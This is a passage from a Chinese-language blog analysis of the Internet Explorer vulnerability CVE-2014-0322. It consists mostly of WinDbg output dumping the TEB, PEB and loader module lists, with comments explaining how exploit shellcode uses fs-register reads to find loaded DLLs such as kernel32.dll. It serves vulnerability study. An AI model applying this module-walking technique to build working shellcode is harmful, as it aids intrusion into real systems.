   +0x6cc Win32ClientInfo  : [62] 0x388
   +0x7c4 glDispatchTable  : [233] (null) 
   +0xb68 glReserved1      : [29] 0
   +0xbdc glReserved2      : (null) 
   +0xbe0 glSectionInfo    : (null) 
   +0xbe4 glSection        : (null) 
   +0xbe8 glTable          : (null) 
   +0xbec glCurrentRC      : (null) 
   +0xbf0 glContext        : (null) 
   +0xbf4 LastStatusValue  : 0xc0000002
   +0xbf8 StaticUnicodeString : _UNICODE_STRING ""
   +0xc00 StaticUnicodeBuffer : [261]  ""
   +0xe0c DeallocationStack : 0x02350000 Void
   +0xe10 TlsSlots         : [64] (null) 
   +0xf10 TlsLinks         : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0xf18 Vdm              : (null) 
   +0xf1c ReservedForNtRpc : 0x00426648 Void
   +0xf20 DbgSsReserved    : [2] (null) 
   +0xf28 HardErrorMode    : 0
   +0xf2c Instrumentation  : [9] (null) 
   +0xf50 ActivityId       : _GUID {00000000-0000-0000-0000-000000000000}
   +0xf60 SubProcessTag    : (null) 
   +0xf64 EtwLocalData     : (null) 
   +0xf68 EtwTraceData     : (null) 
   +0xf6c WinSockData      : (null) 
   +0xf70 GdiBatchCount    : 0
   +0xf74 CurrentIdealProcessor : _PROCESSOR_NUMBER
   +0xf74 IdealProcessorValue : 0
   +0xf74 ReservedPad0     : 0 ‘‘
   +0xf75 ReservedPad1     : 0 ‘‘
   +0xf76 ReservedPad2     : 0 ‘‘
   +0xf77 IdealProcessor   : 0 ‘‘
   +0xf78 GuaranteedStackBytes : 0
   +0xf7c ReservedForPerf  : (null) 
   +0xf80 ReservedForOle   : 0x00425c78 Void
   +0xf84 WaitingOnLoaderLock : 0
   +0xf88 SavedPriorityState : (null) 
   +0xf8c SoftPatchPtr1    : 0
   +0xf90 ThreadPoolData   : (null) 
   +0xf94 TlsExpansionSlots : 0x025b1040  -> (null) 
   +0xf98 MuiGeneration    : 0
   +0xf9c IsImpersonating  : 0
   +0xfa0 NlsCache         : (null) 
   +0xfa4 pShimData        : (null) 
   +0xfa8 HeapVirtualAffinity : 0
   +0xfac CurrentTransactionHandle : (null) 
   +0xfb0 ActiveFrame      : (null) 
   +0xfb4 FlsData          : 0x004258e8 Void
   +0xfb8 PreferredLanguages : (null) 
   +0xfbc UserPrefLanguages : 0x00433ed8 Void
   +0xfc0 MergedPrefLanguages : 0x003e33f8 Void
   +0xfc4 MuiImpersonation : 1
   +0xfc8 CrossTebFlags    : 0
   +0xfc8 SpareCrossTebBits : 0y0000000000000000 (0)
   +0xfca SameTebFlags     : 0x201
   +0xfca SafeThunkCall    : 0y1
   +0xfca InDebugPrint     : 0y0
   +0xfca HasFiberData     : 0y0
   +0xfca SkipThreadAttach : 0y0
   +0xfca WerInShipAssertCode : 0y0
   +0xfca RanProcessInit   : 0y0
   +0xfca ClonedThread     : 0y0
   +0xfca SuppressDebugMsg : 0y0
   +0xfca DisableUserStackWalk : 0y0
   +0xfca RtlExceptionAttached : 0y1
   +0xfca InitialThread    : 0y0
   +0xfca SpareSameTebBits : 0y00000 (0)
   +0xfcc TxnScopeEnterCallback : (null) 
   +0xfd0 TxnScopeExitCallback : (null) 
   +0xfd4 TxnScopeContext  : (null) 
   +0xfd8 LockCount        : 0
   +0xfdc SpareUlong0      : 0
   +0xfe0 ResourceRetValue : 0x00433d98 Void
   
// TK代码中使用mov eax, fs:[0x18]来获取Teb,可能是因为编译问题
0:007> dd 7ffd7000+18
7ffd7018  7ffd7000 00000000 0000077c 000007b8
7ffd7028  00000000 003fd870 7ffdb000 00000000
7ffd7038  00000000 00000000 fe7d3dd8 00000000
7ffd7048  00000000 00000000 00000000 00000000
7ffd7058  00000000 00000000 00000000 00000000
7ffd7068  00000000 00000000 00000000 00000000
7ffd7078  00000000 00000000 00000000 00000000
7ffd7088  00000000 00000000 00000000 00000000
0:007> dd 7ffd7000 
7ffd7000  0254ca1c 02550000 02538000 00000000
7ffd7010  00001e00 00000000 7ffd7000 00000000
7ffd7020  0000077c 000007b8 00000000 003fd870
7ffd7030  7ffdb000 00000000 00000000 00000000
7ffd7040  fe7d3dd8 00000000 00000000 00000000
7ffd7050  00000000 00000000 00000000 00000000
7ffd7060  00000000 00000000 00000000 00000000
7ffd7070  00000000 00000000 00000000 00000000
0:007> r
eax=00000000 ebx=0254b810 ecx=1a1b3100 edx=1a1b35e9 esi=06602020 edi=0254b3e4
eip=1a1b3213 esp=0254b3e4 ebp=0254b830 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
1a1b3213 64a130000000    mov     eax,dword ptr fs:[00000030h] fs:003b:00000030=7ffdb000
0:007> t

// 查看PEB
0:007> dt _PEB 7ffdb000 
ntdll!_PEB
   +0x000 InheritedAddressSpace : 0 ‘‘
   +0x001 ReadImageFileExecOptions : 0 ‘‘
   +0x002 BeingDebugged    : 0x1 ‘‘
   +0x003 BitField         : 0x8 ‘‘
   +0x003 ImageUsesLargePages : 0y0
   +0x003 IsProtectedProcess : 0y0
   +0x003 IsLegacyProcess  : 0y0
   +0x003 IsImageDynamicallyRelocated : 0y1
   +0x003 SkipPatchingUser32Forwarders : 0y0
   +0x003 SpareBits        : 0y000
   +0x004 Mutant           : 0xffffffff Void
   +0x008 ImageBaseAddress : 0x00230000 Void
   +0x00c Ldr              : 0x77e17880 _PEB_LDR_DATA                    //它由PE Loader(加载器)填充,也就说在这个指针指向的结构中,可以找到很多在PE中包含的信息
   +0x010 ProcessParameters : 0x003d12a8 _RTL_USER_PROCESS_PARAMETERS
   +0x014 SubSystemData    : (null) 
   +0x018 ProcessHeap      : 0x003d0000 Void
   +0x01c FastPebLock      : 0x77e17380 _RTL_CRITICAL_SECTION
   +0x020 AtlThunkSListPtr : (null) 
   +0x024 IFEOKey          : (null) 
   +0x028 CrossProcessFlags : 1
   +0x028 ProcessInJob     : 0y1
   +0x028 ProcessInitializing : 0y0
   +0x028 ProcessUsingVEH  : 0y0
   +0x028 ProcessUsingVCH  : 0y0
   +0x028 ProcessUsingFTH  : 0y0
   +0x028 ReservedBits0    : 0y000000000000000000000000000 (0)
   +0x02c KernelCallbackTable : 0x7772d568 Void
   +0x02c UserSharedInfoPtr : 0x7772d568 Void
   +0x030 SystemReserved   : [1] 0
   +0x034 AtlThunkSListPtr32 : 0x256eec8
   +0x038 ApiSetMap        : 0x77f80000 Void
   +0x03c TlsExpansionCounter : 0
   +0x040 TlsBitmap        : 0x77e17260 Void
   +0x044 TlsBitmapBits    : [2] 0xffffffff
   +0x04c ReadOnlySharedMemoryBase : 0x7f6f0000 Void
   +0x050 HotpatchInformation : (null) 
   +0x054 ReadOnlyStaticServerData : 0x7f6f0590  -> (null) 
   +0x058 AnsiCodePageData : 0x7ffa0000 Void
   +0x05c OemCodePageData  : 0x7ffa0000 Void
   +0x060 UnicodeCaseTableData : 0x7ffd0024 Void
   +0x064 NumberOfProcessors : 1
   +0x068 NtGlobalFlag     : 0
   +0x070 CriticalSectionTimeout : _LARGE_INTEGER 0xffffe86d`079b8000
   +0x078 HeapSegmentReserve : 0x100000
   +0x07c HeapSegmentCommit : 0x2000
   +0x080 HeapDeCommitTotalFreeThreshold : 0x10000
   +0x084 HeapDeCommitFreeBlockThreshold : 0x1000
   +0x088 NumberOfHeaps    : 0xd
   +0x08c MaximumNumberOfHeaps : 0x10
   +0x090 ProcessHeaps     : 0x77e17500  -> 0x003d0000 Void
   +0x094 GdiSharedHandleTable : 0x004d0000 Void
   +0x098 ProcessStarterHelper : (null) 
   +0x09c GdiDCAttributeList : 0x14
   +0x0a0 LoaderLock       : 0x77e17340 _RTL_CRITICAL_SECTION
   +0x0a4 OSMajorVersion   : 6
   +0x0a8 OSMinorVersion   : 1
   +0x0ac OSBuildNumber    : 0x1db1
   +0x0ae OSCSDVersion     : 0x100
   +0x0b0 OSPlatformId     : 2
   +0x0b4 ImageSubsystem   : 2
   +0x0b8 ImageSubsystemMajorVersion : 6
   +0x0bc ImageSubsystemMinorVersion : 1
   +0x0c0 ActiveProcessAffinityMask : 1
   +0x0c4 GdiHandleBuffer  : [34] 0
   +0x14c PostProcessInitRoutine : (null) 
   +0x150 TlsExpansionBitmap : 0x77e17268 Void
   +0x154 TlsExpansionBitmapBits : [32] 0x7f
   +0x1d4 SessionId        : 1
   +0x1d8 AppCompatFlags   : _ULARGE_INTEGER 0x100000
   +0x1e0 AppCompatFlagsUser : _ULARGE_INTEGER 0x0
   +0x1e8 pShimData        : (null) 
   +0x1ec AppCompatInfo    : (null) 
   +0x1f0 CSDVersion       : _UNICODE_STRING "Service Pack 1"
   +0x1f8 ActivationContextData : 0x00140000 _ACTIVATION_CONTEXT_DATA
   +0x1fc ProcessAssemblyStorageMap : (null) 
   +0x200 SystemDefaultActivationContextData : 0x00130000 _ACTIVATION_CONTEXT_DATA
   +0x204 SystemAssemblyStorageMap : 0x003e9010 _ASSEMBLY_STORAGE_MAP
   +0x208 MinimumStackCommit : 0
   +0x20c FlsCallback      : 0x003e0b90 _FLS_CALLBACK_INFO
   +0x210 FlsListHead      : _LIST_ENTRY [ 0x3e0980 - 0x25665e0 ]
   +0x218 FlsBitmap        : 0x77e17270 Void
   +0x21c FlsBitmapBits    : [4] 0x1f
   +0x22c FlsHighIndex     : 4
   +0x230 WerRegistrationData : 0x005f0000 Void
   +0x234 WerShipAssertPtr : (null) 
   +0x238 pContextData     : 0x00150000 Void
   +0x23c pImageHeaderHash : (null) 
   +0x240 TracingFlags     : 0
   +0x240 HeapTracingEnabled : 0y0
   +0x240 CritSecTracingEnabled : 0y0
   +0x240 SpareTracingBits : 0y000000000000000000000000000000 (0)

//查看 _PEB_LDR_DATA
0:007> dt _PEB_LDR_DATA 0x77e17880
ntdll!_PEB_LDR_DATA
   +0x000 Length           : 0x30
   +0x004 Initialized      : 0x1 ‘‘
   +0x008 SsHandle         : (null) 
   +0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x3d1c98 - 0x2558dd0 ]
   +0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x3d1ca0 - 0x2558dd8 ]
   +0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0x3d1d28 - 0x2558de0 ]
   +0x024 EntryInProgress  : (null) 
   +0x028 ShutdownInProgress : 0 ‘‘
   +0x02c ShutdownThreadId : (null) 
   
0:007> dt _LIST_ENTRY 0x3d1ca0 
ntdll!_LIST_ENTRY
 [ 0x3d1d20 - 0x77e17894 ]
   +0x000 Flink            : 0x003d1d20 _LIST_ENTRY [ 0x3d2018 - 0x3d1ca0 ]
   +0x004 Blink            : 0x77e17894 _LIST_ENTRY [ 0x3d1ca0 - 0x2558dd8 ]
   
   
0:007> dt _LDR_DATA_TABLE_ENTRY 0x3d1ca0-8
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x3d1d18 - 0x77e1788c ]
   +0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x3d1d20 - 0x77e17894 ]
   +0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x018 DllBase          : 0x00230000 Void
   +0x01c EntryPoint       : 0x00231d06 Void
   +0x020 SizeOfImage      : 0xbc000
   +0x024 FullDllName      : _UNICODE_STRING "C:\Program Files\Internet Explorer\iexplore.exe"
   +0x02c BaseDllName      : _UNICODE_STRING "iexplore.exe"
   +0x034 Flags            : 0x4000
   +0x038 LoadCount        : 0xffff
   +0x03a TlsIndex         : 0
   +0x03c HashLinks        : _LIST_ENTRY [ 0x3de9ec - 0x77e1a600 ]
   +0x03c SectionPointer   : 0x003de9ec Void
   +0x040 CheckSum         : 0x77e1a600
   +0x044 TimeDateStamp    : 0x52ec7da1
   +0x044 LoadedImports    : 0x52ec7da1 Void
   +0x048 EntryPointActivationContext : (null) 
   +0x04c PatchInformation : (null) 
   +0x050 ForwarderLinks   : _LIST_ENTRY [ 0x3d1ce8 - 0x3d1ce8 ]
   +0x058 ServiceTagLinks  : _LIST_ENTRY [ 0x3d1cf0 - 0x3d1cf0 ]
   +0x060 StaticLinks      : _LIST_ENTRY [ 0x3e0550 - 0x3d2918 ]
   +0x068 ContextInformation : 0x77db0554 Void
   +0x06c OriginalBase     : 0
   +0x070 LoadTime         : _LARGE_INTEGER 0x0

0:007> dt _LDR_DATA_TABLE_ENTRY 0x3d1d20-8
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x3d2010 - 0x3d1c98 ]
   +0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x3d2018 - 0x3d1ca0 ]
   +0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x3d2108 - 0x77e1789c ]
   +0x018 DllBase          : 0x77d40000 Void
   +0x01c EntryPoint       : (null) 
   +0x020 SizeOfImage      : 0x13c000
   +0x024 FullDllName      : _UNICODE_STRING "C:\Windows\SYSTEM32\ntdll.dll"
   +0x02c BaseDllName      : _UNICODE_STRING "ntdll.dll"
   +0x034 Flags            : 0x80004004
   +0x038 LoadCount        : 0xffff
   +0x03a TlsIndex         : 0
   +0x03c HashLinks        : _LIST_ENTRY [ 0x3df0ec - 0x77e1a680 ]
   +0x03c SectionPointer   : 0x003df0ec Void
   +0x040 CheckSum         : 0x77e1a680
   +0x044 TimeDateStamp    : 0x4ce7b96e
   +0x044 LoadedImports    : 0x4ce7b96e Void
   +0x048 EntryPointActivationContext : (null) 
   +0x04c PatchInformation : (null) 
   +0x050 ForwarderLinks   : _LIST_ENTRY [ 0x3d1d68 - 0x3d1d68 ]
   +0x058 ServiceTagLinks  : _LIST_ENTRY [ 0x3d1d70 - 0x3d1d70 ]
   +0x060 StaticLinks      : _LIST_ENTRY [ 0x3d1d78 - 0x3d1d78 ]
   +0x068 ContextInformation : (null) 
   +0x06c OriginalBase     : 0x77ec0000
   +0x070 LoadTime         : _LARGE_INTEGER 0x0

0:007> dt _LDR_DATA_TABLE_ENTRY 0x3d2018-8
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x3d20f8 - 0x3d1d18 ]
   +0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x3d2100 - 0x3d1d20 ]
   +0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x3d2860 - 0x3d2108 ]
   +0x018 DllBase          : 0x76d40000 Void
   +0x01c EntryPoint       : 0x76d8cd6f Void
   +0x020 SizeOfImage      : 0xd4000
   +0x024 FullDllName      : _UNICODE_STRING "C:\Windows\system32\kernel32.dll"
   +0x02c BaseDllName      : _UNICODE_STRING "kernel32.dll"
   +0x034 Flags            : 0x80084004
   +0x038 LoadCount        : 0xffff
   +0x03a TlsIndex         : 0
   +0x03c HashLinks        : _LIST_ENTRY [ 0x3de084 - 0x77e1a640 ]
   +0x03c SectionPointer   : 0x003de084 Void
   +0x040 CheckSum         : 0x77e1a640
   +0x044 TimeDateStamp    : 0x503275b9
   +0x044 LoadedImports    : 0x503275b9 Void
   +0x048 EntryPointActivationContext : (null) 
   +0x04c PatchInformation : (null) 
   +0x050 ForwarderLinks   : _LIST_ENTRY [ 0x3d2f48 - 0x3d2f48 ]
   +0x058 ServiceTagLinks  : _LIST_ENTRY [ 0x3d2068 - 0x3d2068 ]
   +0x060 StaticLinks      : _LIST_ENTRY [ 0x3d2190 - 0x3d2090 ]
   +0x068 ContextInformation : 0x77db0554 Void
   +0x06c OriginalBase     : 0x77de0000
   +0x070 LoadTime         : _LARGE_INTEGER 0x1cf7301`5f4c6d43
View Code

 

CVE-2014-0322漏洞成因与利用分析,布布扣,bubuko.com

文章来自:http://www.cnblogs.com/Danny-Wei/p/3766376.html
© 2021 jiaocheng.bubufx.com  联系我们
ICP备案:鲁ICP备09046678号-3